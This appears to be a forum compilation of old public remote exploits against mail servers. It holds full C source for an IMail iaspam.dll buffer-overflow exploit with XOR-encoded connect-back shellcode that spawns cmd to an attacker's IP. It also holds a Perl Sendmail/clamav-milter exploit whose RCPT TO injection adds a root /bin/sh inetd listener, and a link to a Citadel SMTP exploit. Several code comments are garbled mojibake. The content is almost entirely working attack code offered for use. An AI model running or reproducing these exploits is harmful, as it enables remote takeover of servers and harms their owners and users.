//{"ExitProcess"},
//{"TerminateProcess"},
{"WaitForSingleObject"}, // [esi+12]
// ws2_32 3 // 01 ws2_32.dll
{"WSASocketA"}, // [esi+16]
{"connect"}, // [esi+20]
{"closesocket"}, // [esi+24]
//{"WSAStartup"}, // [esi+28]
{""},
};
void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();
// Get function hash
unsigned long hash(unsigned char *c)
{
unsigned long h=0;
while(*c)
{
h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
}
return h;
}
// get shellcode
void GetShellCode(char* ipstr, short port)
{
char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char *pSc_addr;
unsigned char pSc_Buff[2048];
unsigned int MAX_Sc_Len=0x2000;
unsigned long dwHash[100];
unsigned int dwHashSize;
unsigned int l,i,j,k;
char *p;
int ip;
// Get functions hash
for (i=0;;i++) {
if (functions[i][0] == '\x0') break;
dwHash[i] = hash(functions[i]);
//fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]);
}
dwHashSize = i*4;
// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;
for (k=0;k<MAX_Sc_Len;++k ) {
if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
break;
}
}
pSc_addr+=(k+8); // start of the ShellCode
for (k=0;k<MAX_Sc_Len;++k) {
if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
break;
}
}
sh_Len=k; // length of the ShellCode
memcpy(pSc_Buff, pSc_addr, sh_Len);
for(k=0; k<sh_Len; ++k)
{
if(memcmp(pSc_Buff+k, "\x68\x7F\x00\x00\x01", 5) == 0)
{
ip = inet_addr(ipstr);
p = (char*)&ip;
pSc_Buff[k+1] = p[0];
pSc_Buff[k+2] = p[1];
pSc_Buff[k+3] = p[2];
pSc_Buff[k+4] = p[3];
}
if(memcmp(pSc_Buff+k, "\x68\x02\x00\x00\x35", 5) == 0)
{
p = (char*)&port;
pSc_Buff[k+3] = p[1];
pSc_Buff[k+4] = p[0];
}
}
// Add functions hash
memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
sh_Len += dwHashSize;
//printf("%d bytes shellcode\n", sh_Len);
// print shellcode
//PrintSc(pSc_Buff, sh_Len);
// find xor byte
for(i=0xff; i>0; i--)
{
l = 0;
for(j=0; j<sh_Len; j++)
{
if (
// ((pSc_Buff[j] ^ i) == 0x26) || //%
// ((pSc_Buff[j] ^ i) == 0x3d) || //=
// ((pSc_Buff[j] ^ i) == 0x3f) || //?
//((pSc_Buff[j] ^ i) == 0x40) || //@
((pSc_Buff[j] ^ i) == 0x00) ||
//((pSc_Buff[j] ^ i) == 0x3c) ||
//((pSc_Buff[j] ^ i) == 0x3e) ||
// ((pSc_Buff[j] ^ i) == 0x2f) ||
// ((pSc_Buff[j] ^ i) == 0x22) ||
// ((pSc_Buff[j] ^ i) == 0x2a) ||
//((pSc_Buff[j] ^ i) == 0x3a) ||
// ((pSc_Buff[j] ^ i) == 0x20) ||
((pSc_Buff[j] ^ i) == 0x25) ||
((pSc_Buff[j] ^ i) == 0x0D) ||
((pSc_Buff[j] ^ i) == 0x0A)
// ((pSc_Buff[j] ^ i) == 0x5C)
)
{
l++;
break;
};
}
if (l==0)
{
Enc_key = i;
//printf("Find XOR Byte: 0x%02X\n", i);
for(j=0; j<sh_Len; j++)
{
pSc_Buff[j] ^= Enc_key;
}
break; // break when found xor byte
}
}
// No xor byte found
if (l!=0){
//fprintf(stderr, "No xor byte found!\n");
sh_Len = 0;
}
else {
//fprintf(stderr, "Xor byte 0x%02X\n", Enc_key);
// encode
if (sh_Len > 0xFF) {
*(unsigned short *)&decode2[8] = sh_Len;
*(unsigned char *)&decode2[13] = Enc_key;
memcpy(sh_Buff, decode2, sizeof(decode2)-1);
memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode2)-1;
}
else {
*(unsigned char *)&decode1[7] = sh_Len;
*(unsigned char *)&decode1[11] = Enc_key;
memcpy(sh_Buff, decode1, sizeof(decode1)-1);
memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode1)-1;
}
}
}
// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];
printf("/* %d bytes */\n",buffsize);
for(i=0;i<buffsize;i++)
{
if((i%16)==0)
if(i!=0)
printf("\"\n\"");
else
printf("\"");
sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
printf("%c", _tolower(*p));
else
printf("%c", p[0]);
}
}
printf( "\";\n");
}
// ShellCode function
void ShellCode()
{
__asm
{
PROC_BEGIN // C macro to begin proc
jmp sc_end
sc_start:
pop edi // Hash string start addr (esp -> edi)
// Get kernel32.dll base addr
mov eax, fs:0x30 // PEB
mov eax, [eax+0x0c] // PROCESS_MODULE_INFO
mov esi, [eax+0x1c] // InInitOrder.flink
lodsd // eax = InInitOrder.blink
mov ebp, [eax+8] // ebp = kernel32.dll base address
mov esi, edi // Hash string start addr -> esi
// Get function addr of kernel32
push _Knums
pop ecx
get_kernel32:
call GetProcAddress_fun
loop get_kernel32
// Get ws2_32.dll base addr
push 0x00003233
push 0x5f327377
push esp
call dword ptr [esi+_LoadLibraryA] // LoadLibraryA("ws2_32");
//mov ebp, eax // ebp = ws2_32.dll base address
xchg eax, ebp
// Get function addr of ws2_32
push _Wnums
pop ecx
get_ws2_32:
call GetProcAddress_fun
loop get_ws2_32
//
/*
//LWSAStartup:
sub esp, 400
push esp
push 0x101
call dword ptr [esi+_WSAStartup] // WSAStartup(0x101, &WSADATA);
//
*/
//LWSASocketA:
push ecx
push ecx
push ecx
push ecx
push 1
push 2
call dword ptr [esi+_WSASocketA] // s=WSASocketA(2,1,0,0,0,0);
//mov ebx, eax // socket -> ebx
xchg eax, ebx
//Lconnect:
//int 3
push 0x0100007F // host: 127.0.0.1
push 0x35000002 // port: 53
mov ebp, esp
push 0x10 // sizeof(sockaddr_in)
push ebp // sockaddr_in address
push ebx // socket s
call dword ptr [esi+_connect] // connect(s, name, sizeof(name));
// if connect failed , exit
test eax, eax
jne Finished
// xor eax, eax
// allot memory for STARTUPINFO, PROCESS_INFORMATION
mov edi, esp
// zero out SI/PI
push 0x12
pop ecx
stack_zero:
stosd
loop stack_zero
//mov byte ptr [esp+0x10], 0x44 // si.cb = sizeof(si)
//inc byte ptr [esp+0x3C] // si.dwFlags
//inc byte ptr [esp+0x3D] // si.wShowWindow
//mov [esp+0x48], ebx // si.hStdInput = s
//mov [esp+0x4C], ebx // si.hStdOutput = s
//mov [esp+0x50], ebx // si.hStdError = s
mov word ptr [esp+0x3c], 0x0101
xchg eax, ebx
stosd
stosd
stosd
mov edi, esp
// push "cmd"
push 0x00646d63 // "cmd"
mov ebp, esp
push eax // socket
//LCreateProcess:
lea eax, [edi+0x10]
push edi // pi
push eax // si
push ecx // lpCurrentDirectory
push ecx // lpEnvironment
push ecx // dwCreationFlags
push 1 // bInheritHandles
push ecx // lpThreadAttributes
push ecx // lpProcessAttributes
push ebp // lpCommandLine = "cmd"
push ecx // lpApplicationName NULL
call dword ptr [esi+_CreateProcessA] // CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si, pi);
//LWaitForSingleObject:
//push 1
push 0xFFFFFFFF
push dword ptr [edi]
call dword ptr [esi+_WaitForSingleObject] // WaitForSingleObject(Handle, time) ;
//LCloseSocket:
//push ebx
call dword ptr [esi+_closesocket] // closesocket(c);
Finished:
// »ÖžŽ¹Â ¹Ã”ìµÄÒà ƒÂ§Ã‚³Ã¶ÂµÃ£
mov eax, 0x1003546c
mov DWORD ptr [eax], 0x1003549c
mov DWORD ptr [eax+4], 0x100354c8
mov DWORD ptr [eax+8], 0x100354e0
//push 1
//call dword ptr [esi+_ExitProcess] // ExitProcess();
xor eax, eax
push eax
call dword ptr [esi+_ExitThread]
//
GetProcAddress_fun:
push ecx
push esi
mov esi, [ebp+0x3C] // e_lfanew
mov esi, [esi+ebp+0x78] // ExportDirectory RVA
add esi, ebp // rva2va
push esi
mov esi, [esi+0x20] // AddressOfNames RVA
add esi, ebp // rva2va
xor ecx, ecx
dec ecx
find_start:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx
hash_loop:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short find_addr
ror ebx, 7 // hash key
add ebx, edx
inc eax
jmp short hash_loop
find_addr:
cmp ebx, [edi] // compare to hash
jnz short find_start
pop esi // ExportDirectory
// AddressOfNameOrdinals RVA
/*
//--------------------------------------------------------
jmp over_it
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
//--------------------------------------------------------
over_it:
*/
mov ebx, [esi+0x24]
add ebx, ebp // rva2va
mov cx, [ebx+ecx*2] // FunctionOrdinal
mov ebx, [esi+0x1C] // AddressOfFunctions RVA
add ebx, ebp // rva2va
mov eax, [ebx+ecx*4] // FunctionAddress RVA
add eax, ebp // rva2va
stosd // function address save to [edi]
pop esi
pop ecx
ret
sc_end:
call sc_start
PROC_END //C macro to end proc
}
}
// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void help(char *n)
{
printf("==Usage:\n");
printf("%s [target ip] [target port] [local ip] [local port]\n\n", n);
printf("We will send 4 mail to trigger the vuln.\n");
printf("The ****ing vuln will be triggered when the mail server handling the mail.\n");
printf("Because of the Spam in the internet,\nthe vuln maybe triggered after a few days!!****!!\n\n");
}
int send****ingmail(int the_mail, char *target, int tg_port)
{
SOCKET s;
WSADATA WSAData;
char buffer[1000] = {0}; // ÃÂÙʱbufferÓ� �ƒÂƒÃƒÂ“Úio
int ret;
char padding[5000] = {0}; // paddingÓÃÓÚÌ� �ƒÂ®Ã‚³Ã¤
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
fprintf(stderr, "[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
s = Make_Connection(target, tg_port, 10);
if(s<0)
{
fprintf(stderr, "[-] connect err.\n");
exit(1);
}
recv(s, buffer, sizeof(buffer), 0);
Sleep(1000);
ret = strlen(buffer);
if ( ret < 10 )
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
printf("[+]Got Banner: %s", buffer);
// HELO
send(s, szEHLO, strlen(szEHLO), 0);
recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
printf("[+]Say hello to Server.\n");
memset(buffer, 0, sizeof(buffer));
// MAIL FROM
Sleep(500);
send(s, szMF, strlen(szMF), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "250"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
// RCPT TO
Sleep(500);
send(s, szRCPT, strlen(szRCPT), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "250"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
// DATA
Sleep(500);
send(s, szDATA, strlen(szDATA), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "354"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
Sleep(100);
// TIME
send(s, szTIME, strlen(szTIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
printf("[+]****ing Server at %s", szTIME);
memset(buffer, 0, sizeof(buffer));
Sleep(200);
// ÅöÃÂÊÃÂ� �µÚŒž·Ã ¢Ã“ÊŒþ
if (the_mail == 0) // ·¢Ò»·Ã� �¢Ã‚·ÃÂÓÊŒÃ� �¾Â£Â¬ÃŒÃ¡Å¾à ƒÂŸÃ‚³Ã‰Â¹Å Ã‚Ê
{
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 0x10036ea0
padding[4231] = '\x30';
padding[4232] = '\xd8';
padding[4233] = '\xfd';
padding[4234] = '\x7f';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(100);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
Sleep(200);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
else if (the_mail == 1) // ¹¹Ôìbufferoverflow� �‚µÃ„ž²žà‡ÃƒÂ—Ö·ûŽÃ� ��®
{
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 0x10036ea0
padding[4231] = '\x50';
padding[4232] = '\xc0';
padding[4233] = '\xfd';
padding[4234] = '\x7f';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(100);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
Sleep(200);
send(s, (const char *)payload, strlen((const char *)payload), 0);
// send payload ¹¹ÔìÒà§Ã‚³Ã¶ÂµÃ„×à –·ûŽ® eipÖžÃÂòshellcodeÃ� �µÃ„µØÖ·
memset(payload, 0x00, sizeof(payload));
memset(payload, 0x44, 520);
memcpy(payload+520, SCaddr, strlen((const char *)SCaddr));
memcpy(payload+520+4, "\r\n", 2);
Sleep(200);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
else if (the_mail == 2) // ·¢ËÃÂshellcode
{
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x50\xe7\x03\x10"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 0x7ffdc850
padding[4231] = '\x50';
padding[4232] = '\xc8';
padding[4233] = '\xfd';
padding[4234] = '\x7f';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(200);
// ·¢ËÃÂshellcodeÂ� �¹ÃƒÂ½ÃƒÂˆÃ‚¥Â±Â£Ã� �½Ã¦
memset(payload, 0x00, sizeof(payload));
memcpy(payload, sh_Buff, strlen((const char*)sh_Buff));
memcpy(payload+strlen((const char*)sh_Buff), "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
else // µÚÈý·â ÓÊŒþ£Â� �¬Ã‚¹Â¹Ã”ìÒÃ� �§Â³Ã¶
{
Sleep(500); // ÒòΪҠªÃ…½Â¥Â·Â¢Ã‚Ã� ��©Â¶Å½ÃÂË£ ¬ËùÒÔÂ� �±ÃƒÂ˜ÃƒÂëÒªÃ� �ÃÂ*µã£¬Â ²Â»ÃˆÂ»shellcodeÃÃ� ��»ÂµÅ“λ
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x6c\x54\x03\x10"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 Ž¥·¢ÒÃ� �§Ã‚³Ã¶ÂµÃ„µÃ� �˜Ã–·
padding[4231] = '\x6c';
padding[4232] = '\x54';
padding[4233] = '\x03';
padding[4234] = '\x10';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(200);
// send payload ÃÂÞžÄÖŠ¾ÃƒÂ•ÃƒÂ«Ã‚µÃ˜Ã– ·Â£Â¬Â¹Â¹Ã”� �ƒÂ¬Ã‚³Ã¶Ã’ç³ ö
memset(payload, 0x00, sizeof(payload));
// ÃÂèÒªÖŠ¾ÃƒÂò¹¹ÔÃ� �¬ÃƒÂ’ç³ö×à –·ûŽ®µ� �ƒÂ„µØÖ· £Ã‚¬Ã’ÔŒ°2� �…¾Ã¶Â¿Ã‰ÃÂÃ…Â� �µØÖ·
memcpy(payload, "\x50\xc0\xfd\x7f", 4);
memcpy(payload+4, "\x40\xc0\xfd\x7f\x30\xc0\xfd\x7f", 8);
memcpy(payload+12, "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
// END
Sleep(500);
send(s, szEND, strlen(szEND), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "250"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
// QUIT
send(s, szQUIT, strlen(szQUIT), 0);
recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
printf("[+]****ing END, Ejaculating Now !\n\n");
memset(buffer, 0, sizeof(buffer));
Sleep(400);
closesocket(s);
WSACleanup();
return 0;
}
int main(int argc, char *argv[])
{
//int imail_ver = 0; //imail version (buffer²»Ã¬)
//int ret;
//SOCKET s;
//WSADATA WSAData;
printf("\n== IMail iaspam.dll 8.01-8.11 Private Remote Exploit\n");
printf("== by axis@ph4nt0m\n");
printf("== http://www.ph4nt0m.org\n");
printf("== 2007-06\n");
printf("== 2007-09-18 published as a gift for the 6th Anniversary of Ph4nt0m\n");
printf("== ConnBack Version\n");
printf("== Thanks EnvyMask@ph4nt0m\n\n");
if(argc != 5)
{
help(argv[0]);
return 0;
}
if(argc == 5) port = atoi(argv[4]);
GetShellCode(argv[3], port);
if (!sh_Len)
{
printf("[-] Shellcode generate error.\n");
exit(1);
}
//printf("shellcode length is: %d \n",strlen((char *)sh_Buff));
//PrintSc(sh_Buff, sh_Len);
Sleep(200);
for (int mail_payload = 0; mail_payload <= 3; mail_payload++)
{
//printf("[+]Now Sending the %d ****ing Mail!\n",mail_payload+1);
send****ingmail(mail_payload, argv[1], atoi(argv[2]));
Sleep(2000);
}
printf("Got a Shell on your port ?! @_@\n\n");
return 1;
}
// [2007-09-21]
25 Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
################################################## ######
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# [2007-12-21]
25 Citadel SMTP <= 7.10 Remote Overflow Exploit
Citadel SMTP <= 7.10 Remote Overflow Exploit
http://www.enigmagroup.org/sploits/2008-vs-GNU-citadel.tar.gz
# [2008-01-21]
##################################
انتهينا من بورت 22 و بورت 23 و بورت 25
ارجو حفظ الحقوق للجيوش الهكر
تحياتي
#################################